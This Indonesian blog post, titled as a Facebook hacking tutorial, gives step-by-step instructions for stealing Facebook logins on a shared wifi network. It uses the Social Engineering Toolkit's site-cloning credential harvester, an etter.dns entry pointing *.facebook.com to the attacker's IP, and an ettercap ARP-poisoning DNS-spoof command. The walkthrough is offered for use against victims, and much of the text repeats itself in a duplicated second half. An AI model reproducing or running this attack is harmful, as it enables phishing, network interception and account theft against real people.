TUTORIAL HACK FACEBOOK DENGAN SOCIAL ENGINERING TOOLKIT DAN DNS SPOOFING
1. Buka tool social engineering toolkit di kali linux (lihat gambar)
2. Maka kalian akan menemui tampilan seperti gambar dibawah, dan pilih 1 (social engineering attacks)
3. Lalu dilanjutkan dengan memilih nomor 2 (webseite attack vector)
4. Lanjut dengan memilih nomor 3 (credential harvester attack method).
5. Dipilihan ini kita dapat memilih webseite yang akan kita pakai. Tetapi saya disini memilih dengan metode site cloner (mengcopy webseite) dengan pilihan nomor 2.
6. Dan
kalian akan disuruh untuk memasukkan ip kita (buka ip korban), maka
buka terminal baru dan ketik “ifconfig” tanpa tanda petik. Dan saya
mendapati ip saya 192.168.43.8. setelah itu masukkan ip kita ke terminal
SET tadi.
7. Setelah itu kita harus mengisi webseite target kita. Disini saya menggunakan www.facebook.com sebagai target. Lalu ketik dan tekan enter.
8. Tunggu hingga muncul tulisan berwarna biru seperti gambar dibawah
Lalu kita lanjutkan dengan langkah dns spoofing :
1. Buka terminal baru dan ketikkan “leafpad /usr/share/ettercap/etter.dns“ tanpa tanda petik.
2. Setelah diketik kita akan mendapati tampilan leafpad. Maka hapus semua isinya dan ganti dengan
*.facebook.com A (ip address kita). Contoh: *.facebook.com A 192.168.43.8
3. Setelah dimasukkan lalu disave dan di close.
4. Lalu masuk ke terminal lagi dan ketik
Ettercap –Tqi wlan0 –P dns_spoof –M arp // //
Tanda // // bisa diisi dengan ip dan gatway korban, tetapi bisa juga tidak.
5. Dan akan muncul tulisan Activating dns_ spoof plugin… artinya kita telah berhasil men-setting dns spoofing. Dan tunggu hingga korban mengeksekusi facebook.com (terminal jangan di close)
6. Setelah korban mengeksekusi facebook.com maka kita dapat melihat email dan passwordnya.
Saya mencobanya di jaringan wifi. Salam Luar Biasa
1. Buka tool social engineering toolkit di kali linux (lihat gambar)
3. Lalu dilanjutkan dengan memilih nomor 2 (webseite attack vector)
5. Dipilihan ini kita dapat memilih webseite yang akan kita pakai. Tetapi saya disini memilih dengan metode site cloner (mengcopy webseite) dengan pilihan nomor 2.
7. Setelah itu kita harus mengisi webseite target kita. Disini saya menggunakan www.facebook.com sebagai target. Lalu ketik dan tekan enter.
Lalu kita lanjutkan dengan langkah dns spoofing :
1. Buka terminal baru dan ketikkan “leafpad /usr/share/ettercap/etter.dns“ tanpa tanda petik.
*.facebook.com A (ip address kita). Contoh: *.facebook.com A 192.168.43.8
4. Lalu masuk ke terminal lagi dan ketik
Ettercap –Tqi wlan0 –P dns_spoof –M arp // //
Tanda // // bisa diisi dengan ip dan gatway korban, tetapi bisa juga tidak.
5. Dan akan muncul tulisan Activating dns_ spoof plugin… artinya kita telah berhasil men-setting dns spoofing. Dan tunggu hingga korban mengeksekusi facebook.com (terminal jangan di close)
6. Setelah korban mengeksekusi facebook.com maka kita dapat melihat email dan passwordnya.
Saya mencobanya di jaringan wifi. Salam Luar Biasa
0 komentar:
Posting Komentar
Silahkan Berkomentar Dengan Baik
Catatan: Hanya anggota dari blog ini yang dapat mengirim komentar.